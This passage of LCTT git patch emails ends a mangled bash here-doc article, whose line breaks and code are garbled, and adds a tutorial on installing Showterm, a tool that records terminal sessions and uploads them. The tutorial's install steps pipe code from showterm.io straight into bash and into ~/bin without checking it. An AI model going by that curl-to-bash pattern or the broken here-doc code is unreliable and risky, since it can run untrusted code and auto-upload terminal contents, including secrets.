OUT=/tmp/output.txtecho "Starting my script..." echo "Doing something..."tee $OUT </dev/null Status of backup as on $(date) Backing up files $HOME and /etc/ EOFecho "Starting backup using rsync..." + +## A note about using in-memory here-docs + +Here is my updated script: +``` +#!/bin/bash +OUT=/tmp/output.txt + +## in memory here docs +## thanks https://twitter.com/freebsdfrau +exec 9<$OUT + +echo "Starting backup using rsync..." +``` + + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/using-heredoc-rediection-in-bash-shell-script-to-write-to-file/ + +作者:[Vivek Gite][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/media/new/faq/2017/11/redirect-output-of-here-document-to-a-text-file.jpg +[2]:https://bash.cyberciti.biz/guide/Here_documents +[3]:https//www.cyberciti.biz/faq/linux-unix-appleosx-bsd-cat-command-examples/ (See Linux/Unix cat command examples for more info) From dbead827cbdd0d9ea5a34ced2203c1d77a442195 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 22:28:12 +0800 Subject: [PATCH 0904/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Record=20and=20?= =?UTF-8?q?Share=20Terminal=20Session=20with=20Showterm?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...nd Share Terminal Session with Showterm.md | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 sources/tech/20171116 Record and Share Terminal Session with Showterm.md diff --git a/sources/tech/20171116 Record and Share Terminal Session with Showterm.md b/sources/tech/20171116 Record and Share Terminal Session with Showterm.md new file mode 100644 index 0000000000..ff86cf743d --- /dev/null +++ b/sources/tech/20171116 Record and Share Terminal Session with Showterm.md @@ -0,0 +1,74 @@ +Record and Share Terminal Session with Showterm +====== + +![](https://www.maketecheasier.com/assets/uploads/2017/11/record-terminal-session.jpg) + +You can easily record your terminal sessions with virtually all screen recording programs. However, you are very likely to end up with an oversized video file. There are several terminal recorders available in Linux, each with its own strengths and weakness. Showterm is a tool that makes it pretty easy to record terminal sessions, upload them, share, and embed them in any web page. On the plus side, you don't end up with any huge file to deal with. + +Showterm is open source, and the project can be found on this [GitHub page][1]. + + **Related** : [2 Simple Applications That Record Your Terminal Session as Video [Linux]][2] + +### Installing Showterm for Linux + +Showterm requires that you have Ruby installed on your computer. Here's how to go about installing the program. +``` +gem install showterm +``` + +If you don't have Ruby installed on your Linux system: +``` +sudo curl showterm.io/showterm > ~/bin/showterm +sudo chmod +x ~/bin/showterm +``` + +If you just want to run the application without installation: +``` +bash <(curl record.showterm.io) +``` + +You can type `showterm --help` for the help screen. If a help page doesn't appear, showterm is probably not installed. Now that you have Showterm installed (or are running the standalone version), let us dive into using the tool to record. + + **Related** : [How to Record Terminal Session in Ubuntu][3] + +### Recording Terminal Session + +![showterm terminal][4] + +Recording a terminal session is pretty simple. From the command line run `showterm`. This should start the terminal recording in the background. All commands entered in the command line from hereon are recorded by Showterm. Once you are done recording, press Ctrl + D or type `exit` in the command line to stop your recording. + +Showterm should upload your video and output a link to the video that looks like http://showterm.io/. It is rather unfortunate that terminal sessions are uploaded right away without any prompting. Don't panic! You can delete any uploaded recording by entering `showterm --delete `. Before uploading your recordings, you'll have the chance to change the timing by adding the `-e` option to the showterm command. If by any chance a recording fails to upload, you can use `showterm --retry